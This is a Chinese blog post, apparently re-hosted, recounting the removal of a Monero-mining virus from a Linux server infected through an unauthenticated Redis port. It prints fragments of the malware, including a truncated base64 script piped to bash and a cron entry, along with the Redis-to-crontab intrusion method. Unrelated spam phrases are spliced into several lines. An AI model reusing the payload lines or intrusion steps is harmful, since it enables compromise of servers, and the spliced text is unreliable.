Linux中挖矿病毒处理过程
Linux中挖矿病毒处理过程
分享⼀次Linux系统杀毒的经历,还有个⼈的⼀些总结,希望对⼤家有⽤。
进程占CPU 700%,进程名字是类似XY2Arv的6位随机⼤⼩写字母+数字的字符串。最终发现是⼀个叫systemd或trump的病毒,是⼀个挖矿的病毒,在挖⼀种叫门罗币(XMR)的。
该病毒的侵⼊⽅式是通过扫描主机的Redis端⼝,⼀般默认为6379,通过Redis命令将程序注⼊到你的主机,Redis 默认情况下,会绑定在 0.0.0.0:6379,在没有利⽤防⽕墙进⾏屏蔽的情况下,将会将Redis服务暴露到公⽹上,如果在没有开启认证的情况下,可以导致任意⽤户在可以访问⽬标服务器的情况下未授权访问Redis以及读取Redis的数据。攻击者在未授权访问Redis的情况下利⽤Redis的相关⽅法,可以成功将⾃⼰的公钥写⼊⽬标服务器的 ~/.ssh ⽂件夹的authotrized_keys ⽂件中,进⽽可以直接登录⽬标服务器;如果Redis服务是以root权限启动,可以利⽤该问题直接获得服务器root权限
整个⼊侵流程⼤概是包含以下⼏个环节:
1、扫描开放6379端⼝的Linux服务器(后续感染扫描⽹段为1.0.0.0/16到224.255.0.0/16)
2、通过redis-cli尝试连接Redis并执⾏预置在.dat⽂件⾥的利⽤命令将Redis的数据⽂件修改为/var/spool/cron/root,然后通过在Redis 中插⼊数据,将下载执⾏脚本的动作写⼊crontab任务
3、通过脚本实现以上的相关⾏为,完成植⼊并启动挖矿程序
4、再编译安装pnscan,继续扫描感染下⼀个⽬标
逐渐排查并解决:
5. 查看进程实际运⾏应⽤
> ll /proc/26978/exe
lrwxrwxrwx 1 root root 0 Nov 18 05:12 /proc/26978/exe -> /usr/bin/f5ca2c418471f93c1e5a59fea5939e89 (deleted)
可以看到进程启动完就删除了
6. 查看进程的由来
> lsof -p 32559
COMMAND  PID USER  FD  TYPE    DEVICE SIZE/OFF  NODE NAME
wAMj4J  32559 root  cwd    DIR      253,1    20480 655363 /usr/bin深秋的诗句深秋的诗词
wAMj4J  32559 root  rtd    DIR      253,1    4096      2 /
wAMj4J  32559 root  txt    REG      253,1  260544 657105 /usr/bin/e48377a2d8e8e119d1454aa4cd5647c0 (deleted)
清明节2022年是几月几日
wAMj4J  32559 root    0u  IPv4 1769948316      0t0    TCP iZ2ze98732cvvbbjgcwf4wZ:35060-
>222.35.250.117:https (ESTABLISHED)
wAMj4J  32559 root    3w  REG      253,1        6 396140 /tmp/.X11-unix/1
可以看到源头是从/tmp下的⼀个⼦⽬录⾥的⽂件来的,从222.35.250.117上获取的⽊马代码,根据这个ip从⽹上查⼜查出这个地址其他⼈也碰到过类似的。先kill进程,顺便把/tmp⽬录下所有⽬录和⽂件删除。
然后从这个⽹站下载busybox及clear.sh
为防⽌病毒将rm命令劫持,请将busybox⼯具箱上传到/bin/⽬录下,然后使⽤它进⾏删除
/bin/busybox rm -rf /tmp
查看定时任务
> crontab -l5 * * * * /root/.trump >/dev/null 2>&1
检查/root/.trump⽂件发现⾥⾯主要的代码都⽤base64编码了,可以⽤bejson解码看看内容,删除这个⽂件,通过 crontab -e删除
定时任务。
> cat /root/.trump
#!/bin/bash
exec &>/dev/null
echo火把节是哪天
ZXhlYyAmPi9kZXYvbnVsbApleHBvcnQgUEFUSD0kUEFUSDovYmluOi9zYmluOi91c3IvYmluOi91c3Ivc2JpbjovdXNyL2xvY2FsL2Jpb -d|bash
7. 查所有带trump的⽂件
> grep "trump" /etc/ -nri
Binary file /etc/udev/hwdb.bin matches/etc/cron.d/0trump:1:37 * * * * root /opt/trump >/dev/null 2>&1
删除 /etc/cron.d/0trump和/opt/trump
/bin/busybox rm -rf /etc/cron.d/0trump
/bin/busybox rm -rf /opt/trump
注:删除/opt/trump出现⽆法删除,chmod 777 也显⽰⽆权限,这时需执⾏chattr -i /opt/trump,然后再删除就可以了
最后为了安全,再执⾏下改良后的 clear.sh下⽂件,位置必须放在/bin/下
8.查看进程列表有⽆可疑进程(这个的⽬的是查有⽆守护进程,⾃启的原因就是病毒主线程已经kill,但其守护进程没有kill掉)
胃疼怎么快速缓解天津市加成信息咨询有限公司> ps -lef
有2个进程叫ZY8Zrv和VcbzWG,查看由来也是从tmp相同⽬录来的,kill先。再发现2个可疑进程
0 S root      9736 22608  0  80  0 - 28296 do_wai 01:28 ?        00:00:00 sh -c echo
ZXhlYyAmPi9kZXYvbnVsbApleHBvcnQgUEFUSD0kUEFUSDovYmluOi9zYmluOi91c3IvYmluOi91c
0 S root    21043  9742  0  80  0 - 28056 do_wai 08:36 ?        00:00:00 timeout 1h ./ssh : 22 root ./pw
社会主义的本质是什么都kill掉。
8.设置redis密码。redis启动⼀定要设置密码。在f 中 requirepass XXX

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。